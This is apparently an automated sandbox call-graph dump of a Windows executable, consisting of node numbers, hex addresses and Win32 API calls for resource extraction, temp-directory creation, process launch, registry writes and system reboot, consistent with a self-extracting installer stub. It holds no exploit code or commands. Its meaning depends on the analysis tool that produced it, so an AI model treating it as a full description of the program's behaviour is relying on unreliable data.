2335->2336 2337 56740 CharNextA 2336->2337 2338 5674b 2336->2338 2337->2336 2338->2324 2339->2329 2340->2326 2342 548a2 CreateFileA 2341->2342 2344 548e9 2342->2344 2345 54908 2342->2345 2344->2345 2346 548ee 2344->2346 2345->2258 2349 5490c 2346->2349 2350 548f5 CreateFileA 2349->2350 2352 54917 2349->2352 2350->2345 2351 54962 CharNextA 2351->2352 2352->2350 2352->2351 2353 54953 CreateDirectoryA 2352->2353 2353->2351 2354->2274 3160 53210 3161 53227 3160->3161 3183 5328e EndDialog 3160->3183 3162 53235 3161->3162 3163 533e2 GetDesktopWindow 3161->3163 3167 532dd GetDlgItemTextA 3162->3167 3168 5324c 3162->3168 3176 53239 3162->3176 3165 543d0 11 API calls 3163->3165 3166 533f1 SetWindowTextA SendDlgItemMessageA 3165->3166 3169 5341f GetDlgItem EnableWindow 3166->3169 3166->3176 3170 532fc 3167->3170 3193 53366 3167->3193 3171 532c5 EndDialog 3168->3171 3172 53251 3168->3172 3169->3176 3178 53331 GetFileAttributesA 3170->3178 3170->3193 3171->3176 3173 5325c LoadStringA 3172->3173 3172->3176 3175 53294 3173->3175 3185 5327b 3173->3185 3174 544b9 20 API calls 3174->3176 3198 54224 LoadLibraryA 3175->3198 3181 5337c 3178->3181 3182 5333f 3178->3182 3179 544b9 20 API calls 3179->3183 3186 5658a CharPrevA 3181->3186 3187 544b9 20 API calls 3182->3187 3183->3176 3184 532a5 SetDlgItemTextA 3184->3176 3184->3185 3185->3179 3188 5338d 3186->3188 3189 53351 3187->3189 3190 558c8 27 API calls 3188->3190 3189->3176 3191 5335a CreateDirectoryA 3189->3191 3192 53394 3190->3192 3191->3181 3191->3193 3192->3193 3194 533a4 3192->3194 3193->3174 3195 533c7 EndDialog 3194->3195 3196 5597d 34 API calls 3194->3196 3195->3176 3197 533c3 3196->3197 3197->3176 3197->3195 3199 54246 GetProcAddress 3198->3199 3200 543b2 3198->3200 3201 543a4 FreeLibrary 3199->3201 3202 5425d GetProcAddress 3199->3202 3204 544b9 20 API calls 3200->3204 3201->3200 3202->3201 3203 54274 GetProcAddress 3202->3203 3203->3201 3205 5428b 3203->3205 3206 5329d 3204->3206 3207 54295 GetTempPathA 3205->3207 3212 542e1 3205->3212 3206->3176 3206->3184 3208 542ad 3207->3208 3208->3208 3209 542b4 CharPrevA 3208->3209 3210 542d0 CharPrevA 3209->3210 3209->3212 3210->3212 3211 54390 FreeLibrary 3211->3206 3212->3211 3213 54a50 3214 54a66 3213->3214 3215 54a9f ReadFile 3213->3215 3216 54abb 3214->3216 3217 54a82 memcpy 3214->3217 3215->3216 3217->3216 3218 53450 3219 534d3 EndDialog 3218->3219 3220 5345e 3218->3220 3221 5346a 3219->3221 3222 5349a GetDesktopWindow 3220->3222 3226 53465 3220->3226 3223 543d0 11 API calls 3222->3223 3224 534ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3223->3224 3224->3221 3225 5348c EndDialog 3225->3221 3226->3221 3226->3225 2355 54ca0 GlobalAlloc 2356 56a60 2373 57155 2356->2373 2358 56a65 2359 56a76 GetStartupInfoW 2358->2359 2360 56a93 2359->2360 2361 56aa8 2360->2361 2362 56aaf Sleep 2360->2362 2363 56ac7 _amsg_exit 2361->2363 2365 56ad1 2361->2365 2362->2360 2363->2365 2364 56b13 _initterm 2368 56b2e __IsNonwritableInCurrentImage 2364->2368 2365->2364 2366 56af4 2365->2366 2365->2368 2367 56bd6 _ismbblead 2367->2368 2368->2367 2369 56c1e 2368->2369 2372 56bbe exit 2368->2372 2378 52bfb GetVersion 2368->2378 2369->2366 2371 56c27 _cexit 2369->2371 2371->2366 2372->2368 2374 5717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2374 2375 5717a 2373->2375 2377 571cd 2374->2377 2375->2374 2376 571e2 2375->2376 2376->2358 2377->2376 2379 52c50 2378->2379 2380 52c0f 2378->2380 2395 52caa memset memset memset 2379->2395 2380->2379 2381 52c13 GetModuleHandleW 2380->2381 2381->2379 2383 52c22 GetProcAddress 2381->2383 2383->2379 2392 52c34 2383->2392 2385 52c8e 2386 52c97 CloseHandle 2385->2386 2387 52c9e 2385->2387 2386->2387 2387->2368 2392->2379 2393 52c89 2489 51f90 2393->2489 2506 5468f FindResourceA SizeofResource 2395->2506 2398 52ef3 2400 544b9 20 API calls 2398->2400 2399 52d2d CreateEventA SetEvent 2401 5468f 7 API calls 2399->2401 2402 52d6e 2400->2402 2403 52d57 2401->2403 2407 56ce0 4 API calls 2402->2407 2404 52d5b 2403->2404 2406 52e1f 2403->2406 2409 5468f 7 API calls 2403->2409 2405 544b9 20 API calls 2404->2405 2405->2402 2511 55c9e 2406->2511 2410 52c62 2407->2410 2412 52d9f 2409->2412 2410->2385 2436 52f1d 2410->2436 2412->2404 2415 52da3 CreateMutexA 2412->2415 2413 52e30 2413->2398 2414 52e3a 2416 52e43 2414->2416 2417 52e52 FindResourceA 2414->2417 2415->2406 2418 52dbd GetLastError 2415->2418 2537 52390 2416->2537 2421 52e64 LoadResource 2417->2421 2422 52e6e 2417->2422 2418->2406 2420 52dca 2418->2420 2424 52dd5 2420->2424 2425 52dea 2420->2425 2421->2422 2423 52e4d 2422->2423 2552 536ee GetVersionExA 2422->2552 2423->2402 2426 544b9 20 API calls 2424->2426 2427 544b9 20 API calls 2425->2427 2429 52de8 2426->2429 2430 52dff 2427->2430 2431 52e04 CloseHandle 2429->2431 2430->2406 2430->2431 2431->2402 2435 56517 24 API calls 2435->2423 2437 52f6c 2436->2437 2438 52f3f 2436->2438 2660 55164 2437->2660 2439 52f5f 2438->2439 2641 551e5 2438->2641 2788 53a3f 2439->2788 2443 52f71 2472 5303c 2443->2472 2673 555a0 2443->2673 2447 56ce0 4 API calls 2449 52c6b 2447->2449 2476 552b6 2449->2476 2450 52f86 GetSystemDirectoryA 2451 5658a CharPrevA 2450->2451 2452 52fab LoadLibraryA 2451->2452 2453 52ff7 FreeLibrary 2452->2453 2454 52fc0 GetProcAddress 2452->2454 2456 53017 SetCurrentDirectoryA 2453->2456 2457 53006 2453->2457 2454->2453 2455 52fd6 DecryptFileA 2454->2455 2455->2453 2464 52ff0 2455->2464 2458 53026 2456->2458 2461 53054 2456->2461 2457->2456 2721 5621e GetWindowsDirectoryA 2457->2721 2463 544b9 20 API calls 2458->2463 2460 53061 2466 5307a 2460->2466 2460->2472 2740 5256d 2460->2740 2461->2460 2731 53b26 2461->2731 2468 53037 2463->2468 2464->2453 2471 53098 2466->2471 2751 53ba2 2466->2751 2807 56285 GetLastError 2468->2807 2471->2472 2474 530af 2471->2474 2472->2447 2809 54169 2474->2809 2477 552d6 2476->2477 2485 55316 2476->2485 2478 55300 LocalFree LocalFree 2477->2478 2480 552eb SetFileAttributesA DeleteFileA 2477->2480 2478->2477 2478->2485 2479 5538c 2482 56ce0 4 API calls 2479->2482 2480->2478 2481 55374 2481->2479 3115 51fe1 2481->3115 2484 52c72 2482->2484 2484->2385 2484->2393 2485->2481 2486 5535e SetCurrentDirectoryA 2485->2486 2487 565e8 4 API calls 2485->2487 2488 52390 13 API calls 2486->2488 2487->2486 2488->2481 2490 51f9a 2489->2490 2492 51f9f 2489->2492 2491 51ea7 15 API calls 2490->2491 2491->2492 2493 544b9 20 API calls 2492->2493 2496 51fd9 2492->2496 2497 51fc0 2492->2497 2493->2497 2494 51fcf ExitWindowsEx 2494->2496 2495 51ee2 GetCurrentProcess OpenProcessToken 2499 51f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2500 51f0e 2495->2500 2496->2385 2497->2494 2497->2495 2497->2496 2499->2500 2501 51f6b ExitWindowsEx 2499->2501 2503 544b9 20 API calls 2500->2503 2501->2500 2502 51f1f 2501->2502 2504 56ce0 4 API calls 2502->2504 2503->2502 2505 51f8c 2504->2505 2505->2385 2507 546b6 2506->2507 2508 52d1a 2506->2508 2507->2508 2509 546be FindResourceA LoadResource LockResource 2507->2509 2508->2398 2508->2399 2509->2508 2510 546df memcpy_s FreeResource 2509->2510 2510->2508 2517 55e17 2511->2517 2521 55cc3 2511->2521 2512 56ce0 4 API calls 2515 52e2c 2512->2515 2513 55dd0 2516 55dec GetModuleFileNameA 2513->2516 2513->2517 2514 55ced CharNextA 2514->2521 2515->2413 2515->2414 2516->2517 2518 55e0a 2516->2518 2517->2512 2587 566c8 2518->2587 2520 56218 2596 56e2a 2520->2596 2521->2513 2521->2514 2521->2517 2521->2520 2524 55e36 CharUpperA 2521->2524 2530 55f9f CharUpperA 2521->2530 2531 55f59 CompareStringA 2521->2531 2532 56003 CharUpperA 2521->2532 2533 55edc CharUpperA 2521->2533 2534 560a2 CharUpperA 2521->2534 2535 5667f IsDBCSLeadByte CharNextA 2521->2535 2592 5658a 2521->2592 2524->2521 2525 561d0 2524->2525 2526 544b9 20 API calls 2525->2526 2527 561e7 2526->2527 2528 561f7 ExitProcess 2527->2528 2529 561f0 CloseHandle 2527->2529 2529->2528 2530->2521 2531->2521 2532->2521 2533->2521 2534->2521 2535->2521 2538 524cb 2537->2538 2541 523b9 2537->2541 2539 56ce0 4 API calls 2538->2539 2540 524dc 2539->2540 2540->2423 2541->2538 2542 523e9 FindFirstFileA 2541->2542 2542->2538 2550 52407 2542->2550 2543 52421 lstrcmpA 2545 52431 lstrcmpA 2543->2545 2546 524a9 FindNextFileA 2543->2546 2544 52479 2547 52488 SetFileAttributesA DeleteFileA 2544->2547 2545->2546 2545->2550 2548 524bd FindClose RemoveDirectoryA 2546->2548 2546->2550 2547->2546 2548->2538 2549 5658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2546 2550->2549 2551 52390 5 API calls 2550->2551 2551->2550 2553 5372d 2552->2553 2557 53737 2552->2557 2554 544b9 20 API calls 2553->2554 2566 539fc 2553->2566 2554->2566 2555 56ce0 4 API calls 2556 52e92 2555->2556 2556->2402 2556->2423 2567 518a3 2556->2567 2557->2553 2559 538a4 2557->2559 2557->2566 2603 528e8 2557->2603 2559->2553 2560 539c1 MessageBeep 2559->2560 2559->2566 2561 5681f 10 API calls 2560->2561 2562 539ce 2561->2562 2563 539d8 MessageBoxA 2562->2563 2565 567c9 EnumResourceLanguagesA 2562->2565 2563->2566 2565->2563 2566->2555 2568 518d5 2567->2568 2575 519b8 2567->2575 2632 517ee LoadLibraryA 2568->2632 2569 56ce0 4 API calls 2572 519d5 2569->2572 2572->2423 2572->2435 2573 518e5 GetCurrentProcess OpenProcessToken 2574 51900 GetTokenInformation 2573->2574 2573->2575 2576 51918 GetLastError 2574->2576 2577 519aa CloseHandle 2574->2577 2575->2569 2576->2577 2578 51927 LocalAlloc 2576->2578 2577->2575 2579 519a9 2578->2579 2580 51938 GetTokenInformation 2578->2580 2579->2577 2581 519a2 LocalFree 2580->2581 2582 5194e AllocateAndInitializeSid 2580->2582 2581->2579 2582->2581 2585 5196e 2582->2585 2583 51999 FreeSid 2583->2581 2584 51975 EqualSid 2584->2585 2586 5198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2588 566d5 2587->2588 2589 566f3 2588->2589 2591 566e5 CharNextA 2588->2591 2599 56648 2588->2599 2589->2517 2591->2588 2593 5659b 2592->2593 2593->2593 2594 565ab 2593->2594 2595 565b8 CharPrevA 2593->2595 2594->2521 2595->2594 2602 56cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 5621d 2600 5665d IsDBCSLeadByte 2599->2600 2601 56668 2599->2601 2600->2601 2601->2588 2602->2598 2604 52a62 2603->2604 2611 5290d 2603->2611 2605 52a75 2604->2605 2606 52a6e GlobalFree 2604->2606 2605->2559 2606->2605 2608 52955 GlobalAlloc 2608->2604 2609 52968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 52a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 52a80 GlobalUnlock 2611->2612 2613 52773 2611->2613 2612->2604 2614 527a3 CharUpperA CharNextA CharNextA 2613->2614 2615 528b2 2613->2615 2616 528b7 GetSystemDirectoryA 2614->2616 2617 527db 2614->2617 2615->2616 2620 528bf 2616->2620 2618 527e3 2617->2618 2619 528a8 GetWindowsDirectoryA 2617->2619 2624 5658a CharPrevA 2618->2624 2619->2620 2621 528d2 2620->2621 2622 5658a CharPrevA 2620->2622 2623 56ce0 4 API calls 2621->2623 2622->2621 2625 528e2 2623->2625 2626 52810 RegOpenKeyExA 2624->2626 2625->2611 2626->2620 2627 52837 RegQueryValueExA 2626->2627 2628 5285c 2627->2628 2629 5289a RegCloseKey 2627->2629 2630 52867 ExpandEnvironmentStringsA 2628->2630 2631 5287a 2628->2631 2629->2620 2630->2631 2631->2629 2633 51826 GetProcAddress 2632->2633 2634 51890 2632->2634 2636 51889 FreeLibrary 2633->2636 2637 51839 AllocateAndInitializeSid 2633->2637 2635 56ce0 4 API calls 2634->2635 2638 5189f 2635->2638 2636->2634 2637->2636 2640 5185f FreeSid 2637->2640 2638->2573 2638->2575 2640->2636 2642 5468f 7 API calls 2641->2642 2643 551f9 LocalAlloc 2642->2643 2644 5522d 2643->2644 2645 5520d 2643->2645 2647 5468f 7 API calls 2644->2647 2646 544b9 20 API calls 2645->2646 2648 5521e 2646->2648 2649 5523a 2647->2649 2650 56285 GetLastError 2648->2650 2651 55262 lstrcmpA 2649->2651 2652 5523e 2649->2652 2657 52f4d 2650->2657 2654 55272 LocalFree 2651->2654 2655 5527e 2651->2655 2653 544b9 20 API calls 2652->2653 2656 5524f LocalFree 2653->2656 2654->2657 2658 544b9 20 API calls 2655->2658 2656->2657 2657->2437 2657->2439 2657->2472 2659 55290 LocalFree 2658->2659 2659->2657 2661 5468f 7 API calls 2660->2661 2662 55175 2661->2662 2663 5517a 2662->2663 2664 551af 2662->2664 2666 544b9 20 API calls 2663->2666 2665 5468f 7 API calls 2664->2665 2667 551c0 2665->2667 2672 5518d 2666->2672 2822 56298 2667->2822 2670 551e1 2670->2443 2671 544b9 20 API calls 2671->2672 2672->2443 2674 5468f 7 API calls 2673->2674 2675 555c7 LocalAlloc 2674->2675 2676 555fd 2675->2676 2677 555db 2675->2677 2679 5468f 7 API calls 2676->2679 2678 544b9 20 API calls 2677->2678 2680 555ec 2678->2680 2681 5560a 2679->2681 2682 56285 GetLastError 2680->2682 2683 55632 lstrcmpA 2681->2683 2684 5560e 2681->2684 2709 555f1 2682->2709 2685 55645 2683->2685 2686 5564b LocalFree 2683->2686 2687 544b9 20 API calls 2684->2687 2685->2686 2688 55696 2686->2688 2689 5565b 2686->2689 2690 5561f LocalFree 2687->2690 2691 5589f 2688->2691 2694 556ae GetTempPathA 2688->2694 2695 55467 49 API calls 2689->2695 2690->2709 2692 56517 24 API calls 2691->2692 2692->2709 2693 56ce0 4 API calls 2696 52f7e 2693->2696 2697 556eb 2694->2697 2698 556c3 2694->2698 2699 55678 2695->2699 2696->2450 2696->2472 2703 55717 GetDriveTypeA 2697->2703 2704 5586c GetWindowsDirectoryA 2697->2704 2697->2709 2834 55467 2698->2834 2702 544b9 20 API calls 2699->2702 2699->2709 2702->2709 2707 55730 GetFileAttributesA 2703->2707 2719 5572b 2703->2719 2868 5597d GetCurrentDirectoryA SetCurrentDirectoryA 2704->2868 2707->2719 2709->2693 2710 5597d 34 API calls 2710->2719 2711 55467 49 API calls 2711->2697 2713 52630 21 API calls 2713->2719 2714 557c1 GetWindowsDirectoryA 2714->2719 2715 5658a CharPrevA 2716 557e8 GetFileAttributesA 2715->2716 2717 557fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 55827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2707 2719->2709 2719->2710 2719->2713 2719->2714 2719->2715 2719->2718 2720 55467 49 API calls 2719->2720 2864 56952 2719->2864 2720->2719 2722 56249 2721->2722 2723 56268 2721->2723 2725 544b9 20 API calls 2722->2725 2724 5597d 34 API calls 2723->2724 2730 5625f 2724->2730 2726 5625a 2725->2726 2728 56285 GetLastError 2726->2728 2727 56ce0 4 API calls 2729 53013 2727->2729 2728->2730 2729->2456 2729->2472 2730->2727 2732 53b2d 2731->2732 2732->2732 2733 53b72 2732->2733 2734 53b53 2732->2734 2934 54fe0 2733->2934 2736 56517 24 API calls 2734->2736 2737 53b70 2736->2737 2738 56298 10 API calls 2737->2738 2739 53b7b 2737->2739 2738->2739 2739->2460 2741 52583 2740->2741 2742 52622 2740->2742 2744 525e8 RegOpenKeyExA 2741->2744 2745 5258b 2741->2745 2961 524e0 GetWindowsDirectoryA 2742->2961 2746 52609 RegQueryInfoKeyA 2744->2746 2747 525e3 2744->2747 2745->2747 2748 5259b RegOpenKeyExA 2745->2748 2749 525d1 RegCloseKey 2746->2749 2747->2466 2748->2747 2750 525bc RegQueryValueExA 2748->2750 2749->2747 2750->2749 2752 53bdb 2751->2752 2767 53bec 2751->2767 2753 5468f 7 API calls 2752->2753 2753->2767 2754 53c03 memset 2754->2767 2755 53d13 2756 544b9 20 API calls 2755->2756 2763 53d26 2756->2763 2758 5468f 7 API calls 2758->2767 2759 56ce0 4 API calls 2762 53f60 2759->2762 2760 53d7b CompareStringA 2761 53fd7 2760->2761 2760->2767 2761->2763 3060 52267 2761->3060 2762->2471 2763->2759 2765 53fab 2768 544b9 20 API calls 2765->2768 2767->2754 2767->2755 2767->2758 2767->2760 2767->2761 2767->2763 2767->2765 2769 53f46 LocalFree 2767->2769 2770 53f1e LocalFree 2767->2770 2774 53cc7 CompareStringA 2767->2774 2785 53e10 2767->2785 2969 51ae8 2767->2969 3010 5202a memset memset RegCreateKeyExA 2767->3010 3036 53fef 2767->3036 2772 53fbe LocalFree 2768->2772 2769->2763 2770->2761 2770->2767 2772->2763 2774->2767 2775 53f92 2778 544b9 20 API calls 2775->2778 2776 53e1f GetProcAddress 2777 53f64 2776->2777 2776->2785 2779 544b9 20 API calls 2777->2779 2780 53fa9 2778->2780 2781 53f75 FreeLibrary 2779->2781 2782 53f7c LocalFree 2780->2782 2781->2782 2783 56285 GetLastError 2782->2783 2784 53f8b 2783->2784 2784->2763 2785->2775 2785->2776 2786 53f40 FreeLibrary 2785->2786 2787 53eff FreeLibrary 2785->2787 3050 56495 2785->3050 2786->2769 2787->2770 2789 5468f 7 API calls 2788->2789 2790 53a55 LocalAlloc 2789->2790 2791 53a6c 2790->2791 2792 53a8e 2790->2792 2793 544b9 20 API calls 2791->2793 2794 5468f 7 API calls 2792->2794 2795 53a7d 2793->2795 2796 53a98 2794->2796 2797 56285 GetLastError 2795->2797 2798 53ac5 lstrcmpA 2796->2798 2799 53a9c 2796->2799 2806 52f64 2797->2806 2800 53b0d LocalFree 2798->2800 2801 53ada 2798->2801 2802 544b9 20 API calls 2799->2802 2800->2806 2803 56517 24 API calls 2801->2803 2804 53aad LocalFree 2802->2804 2805 53aec LocalFree 2803->2805 2804->2806 2805->2806 2806->2437 2806->2472 2808 5628f 2807->2808 2808->2472 2810 5468f 7 API calls 2809->2810 2811 5417d LocalAlloc 2810->2811 2812 54195 2811->2812 2813 541a8 2811->2813 2814 544b9 20 API calls 2812->2814 2815 5468f 7 API calls 2813->2815 2817 541a6 2814->2817 2816 541b5 2815->2816 2818 541c5 lstrcmpA 2816->2818 2819 541b9 2816->2819 2817->2472 2818->2819 2820 541e6 LocalFree 2818->2820 2821 544b9 20 API calls 2819->2821 2820->2817 2821->2820 2823 5171e _vsnprintf 2822->2823 2833 562c9 FindResourceA 2823->2833 2825 562cb LoadResource LockResource 2826 56353 2825->2826 2829 562e0 2825->2829 2827 56ce0 4 API calls 2826->2827 2828 551ca 2827->2828 2828->2670 2828->2671 2830 56355 FreeResource 2829->2830 2831 5631b FreeResource 2829->2831 2830->2826 2832 5171e _vsnprintf 2831->2832 2832->2833 2833->2825 2833->2826 2835 5551a 2834->2835 2836 5548a 2834->2836 2905 558c8 2835->2905 2894 553a1 2836->2894 2838 55581 2842 56ce0 4 API calls 2838->2842 2841 55495 2841->2838 2845 554c2 GetSystemInfo 2841->2845 2846 5550c 2841->2846 2847 5559a 2842->2847 2843 5554d 2843->2838 2850 5597d 34 API calls 2843->2850 2844 5553b CreateDirectoryA 2848 55577 2844->2848 2849 55547 2844->2849 2855 554da 2845->2855 2851 5658a CharPrevA 2846->2851 2847->2709 2858 52630 GetWindowsDirectoryA 2847->2858 2852 56285 GetLastError 2848->2852 2849->2843 2854 5555c 2850->2854 2851->2835 2853 5557c 2852->2853 2853->2838 2854->2838 2857 55568 RemoveDirectoryA 2854->2857 2855->2846 2856 5658a CharPrevA 2855->2856 2856->2846 2857->2838 2859 5266f 2858->2859 2860 5265e 2858->2860 2862 56ce0 4 API calls 2859->2862 2861 544b9 20 API calls 2860->2861 2861->2859 2863 52687 2862->2863 2863->2697 2863->2711 2865 569a1 2864->2865 2866 5696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 56989 MulDiv 2866->2867 2867->2865 2869 559dd GetDiskFreeSpaceA 2868->2869 2870 559bb 2868->2870 2872 55ba1 memset 2869->2872 2873 55a21 MulDiv 2869->2873 2871 544b9 20 API calls 2870->2871 2874 559cc 2871->2874 2875 56285 GetLastError 2872->2875 2873->2872 2876 55a50 GetVolumeInformationA 2873->2876 2877 56285 GetLastError 2874->2877 2878 55bbc GetLastError FormatMessageA 2875->2878 2879 55ab5 SetCurrentDirectoryA 2876->2879 2880 55a6e memset 2876->2880 2888 559d1 2877->2888 2881 55be3 2878->2881 2887 55acc 2879->2887 2882 56285 GetLastError 2880->2882 2883 544b9 20 API calls 2881->2883 2884 55a89 GetLastError FormatMessageA 2882->2884 2885 55bf5 SetCurrentDirectoryA 2883->2885 2884->2881 2885->2888 2886 56ce0 4 API calls 2889 55c11 2886->2889 2890 55b0a 2887->2890 2892 55b20 2887->2892 2888->2886 2889->2697 2891 544b9 20 API calls 2890->2891 2891->2888 2892->2888 2917 5268b 2892->2917 2896 553bf 2894->2896 2895 5171e _vsnprintf 2895->2896 2896->2895 2897 5658a CharPrevA 2896->2897 2900 55415 GetTempFileNameA 2896->2900 2898 553fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 5544f CreateDirectoryA 2898->2899 2899->2900 2901 5543a 2899->2901 2900->2901 2902 55429 DeleteFileA CreateDirectoryA 2900->2902 2903 56ce0 4 API calls 2901->2903 2902->2901 2904 55449 2903->2904 2904->2841 2906 558d8 2905->2906 2906->2906 2907 558df LocalAlloc 2906->2907 2908 558f3 2907->2908 2909 55919 2907->2909 2910 544b9 20 API calls 2908->2910 2912 5658a CharPrevA 2909->2912 2911 55906 2910->2911 2913 56285 GetLastError 2911->2913 2916 55534 2911->2916 2914 55931 CreateFileA LocalFree 2912->2914 2913->2916 2914->2911 2915 5595b CloseHandle GetFileAttributesA 2914->2915 2915->2911 2916->2843 2916->2844 2918 526e5 2917->2918 2919 526b9 2917->2919 2921 5271f 2918->2921 2922 526ea 2918->2922 2920 5171e _vsnprintf 2919->2920 2924 526cc 2920->2924 2926 5171e _vsnprintf 2921->2926 2932 526e3 2921->2932 2923 5171e _vsnprintf 2922->2923 2925 526fd 2923->2925 2928 544b9 20 API calls 2924->2928 2929 544b9 20 API calls 2925->2929 2930 52735 2926->2930 2927 56ce0 4 API calls 2931 5276d 2927->2931 2928->2932 2929->2932 2933 544b9 20 API calls 2930->2933 2931->2888 2932->2927 2933->2932 2935 5468f 7 API calls 2934->2935 2936 54ff5 FindResourceA LoadResource LockResource 2935->2936 2937 55020 2936->2937 2950 5515f 2936->2950 2938 55057 2937->2938 2939 55029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 54efd 2938->2953 2939->2938 2942 55060 2944 544b9 20 API calls 2942->2944 2943 5507c 2945 544b9 20 API calls 2943->2945 2947 55075 2943->2947 2944->2947 2945->2947 2946 55110 FreeResource 2948 5511d 2946->2948 2947->2946 2947->2948 2949 5513a 2948->2949 2952 544b9 20 API calls 2948->2952 2949->2950 2951 5514c SendMessageA 2949->2951 2950->2737 2951->2950 2952->2949 2954 54f4a 2953->2954 2955 54fa1 2954->2955 2956 54980 25 API calls 2954->2956 2957 56ce0 4 API calls 2955->2957 2959 54f67 2956->2959 2958 54fc6 2957->2958 2958->2942 2958->2943 2959->2955 2960 54b60 FindCloseChangeNotification 2959->2960 2960->2955 2962 52510 2961->2962 2963 5255b 2961->2963 2964 5658a CharPrevA 2962->2964 2965 56ce0 4 API calls 2963->2965 2966 52522 WritePrivateProfileStringA _lopen 2964->2966 2967 52569 2965->2967 2966->2963 2968 52548 _llseek _lclose 2966->2968 2967->2747 2968->2963 2970 51b25 2969->2970 3074 51a84 2970->3074 2972 51b57 2973 5658a CharPrevA 2972->2973 2975 51b8c 2972->2975 2973->2975 2974 566c8 2 API calls 2976 51bd1 2974->2976 2975->2974 2977 51d73 2976->2977 2978 51bd9 CompareStringA 2976->2978 2980 566c8 2 API calls 2977->2980 2978->2977 2979 51bf7 GetFileAttributesA 2978->2979 2981 51d53 2979->2981 2982 51c0d 2979->2982 2983 51d7d 2980->2983 2984 51d64 2981->2984 2982->2981 2989 51a84 2 API calls 2982->2989 2985 51d81 CompareStringA 2983->2985 2986 51df8 LocalAlloc 2983->2986 2987 544b9 20 API calls 2984->2987 2985->2986 2995 51d9b 2985->2995 2986->2984 2988 51e0b GetFileAttributesA 2986->2988 2990 51d6c 2987->2990 2991 51e1d 2988->2991 3005 51e45 2988->3005 2992 51c31 2989->2992 2994 56ce0 4 API calls 2990->2994 2991->3005 2993 51c50 LocalAlloc 2992->2993 2999 51a84 2 API calls 2992->2999 2993->2984 2996 51c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2996 2998 51ea1 2994->2998 2995->2995 3000 51dbe LocalAlloc 2995->3000 3002 51cc2 2996->3002 3003 51cf8 2996->3003 2998->2767 2999->2993 3000->2984 3004 51de1 3000->3004 3002->2990 3006 51d09 GetShortPathNameA 3003->3006 3008 51d23 3003->3008 3007 5171e _vsnprintf 3004->3007 3080 52aac 3005->3080 3006->3008 3007->3002 3009 5171e _vsnprintf 3008->3009 3009->3002 3011 52256 3010->3011 3012 5209a 3010->3012 3013 56ce0 4 API calls 3011->3013 3015 5171e _vsnprintf 3012->3015 3017 520dc 3012->3017 3014 52263 3013->3014 3014->2767 3016 520af RegQueryValueExA 3015->3016 3016->3012 3016->3017 3018 520e4 RegCloseKey 3017->3018 3019 520fb GetSystemDirectoryA 3017->3019 3018->3011 3020 5658a CharPrevA 3019->3020 3021 5211b LoadLibraryA 3020->3021 3022 5212e GetProcAddress FreeLibrary 3021->3022 3023 52179 GetModuleFileNameA 3021->3023 3022->3023 3025 5214e GetSystemDirectoryA 3022->3025 3024 521de RegCloseKey 3023->3024 3028 52177 LocalAlloc 3023->3028 3024->3011 3026 52165 3025->3026 3025->3028 3027 5658a CharPrevA 3026->3027 3027->3028 3030 521cd 3028->3030 3031 521ec 3028->3031 3032 544b9 20 API calls 3030->3032 3033 5171e _vsnprintf 3031->3033 3032->3024 3034 52218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3011 3037 54016 CreateProcessA 3036->3037 3048 54106 3036->3048 3038 540c4 3037->3038 3039 54041 WaitForSingleObject GetExitCodeProcess 3037->3039 3041 56285 GetLastError 3038->3041 3042 54070 3039->3042 3040 56ce0 4 API calls 3043 54117 3040->3043 3044 540c9 GetLastError FormatMessageA 3041->3044 3107 5411b 3042->3107 3043->2767 3046 544b9 20 API calls 3044->3046 3046->3048 3047 54096 CloseHandle CloseHandle 3047->3048 3049 540ba 3047->3049 3048->3040 3049->3048 3051 564c2 3050->3051 3052 5658a CharPrevA 3051->3052 3053 564d8 GetFileAttributesA 3052->3053 3054 56501 LoadLibraryA 3053->3054 3055 564ea 3053->3055 3057 56508 3054->3057 3055->3054 3056 564ee LoadLibraryExA 3055->3056 3056->3057 3058 56ce0 4 API calls 3057->3058 3059 56513 3058->3059 3059->2785 3061 52289 RegOpenKeyExA 3060->3061 3063 52381 3060->3063 3061->3063 3064 522b1 RegQueryValueExA 3061->3064 3062 56ce0 4 API calls 3065 5238c 3062->3065 3063->3062 3066 52374 RegCloseKey 3064->3066 3067 522e6 memset GetSystemDirectoryA 3064->3067 3065->2763 3066->3063 3068 52321 3067->3068 3069 5230f 3067->3069 3071 5171e _vsnprintf 3068->3071 3070 5658a CharPrevA 3069->3070 3070->3068 3072 5233f RegSetValueExA 3071->3072 3072->3066 3075 51a9a 3074->3075 3077 51aba 3075->3077 3079 51aaf 3075->3079 3093 5667f 3075->3093 3077->2972 3078 5667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 52ad4 GetModuleFileNameA 3080->3081 3082 52be6 3080->3082 3090 52b02 3081->3090 3083 56ce0 4 API calls 3082->3083 3085 52bf5 3083->3085 3084 52af1 IsDBCSLeadByte 3084->3090 3085->2990 3086 52b11 CharNextA CharUpperA 3089 52b8d CharUpperA 3086->3089 3086->3090 3087 52bca CharNextA 3088 52bd3 CharNextA 3087->3088 3088->3090 3089->3090 3090->3082 3090->3084 3090->3086 3090->3087 3090->3088 3092 52b43 CharPrevA 3090->3092 3098 565e8 3090->3098 3092->3090 3095 56689 3093->3095 3094 56648 IsDBCSLeadByte 3094->3095 3095->3094 3096 56697 CharNextA 3095->3096 3097 566a5 3095->3097 3096->3095 3097->3075 3099 565f4 3098->3099 3099->3099 3100 565fb CharPrevA 3099->3100 3101 56611 CharPrevA 3100->3101 3102 5661e 3101->3102 3103 5660b 3101->3103 3104 56634 CharNextA 3102->3104 3105 56627 CharPrevA 3102->3105 3106 5663d 3102->3106 3103->3101 3103->3102 3104->3106 3105->3104 3105->3106 3106->3090 3108 54132 3107->3108 3110 5412a 3107->3110 3111 51ea7 3108->3111 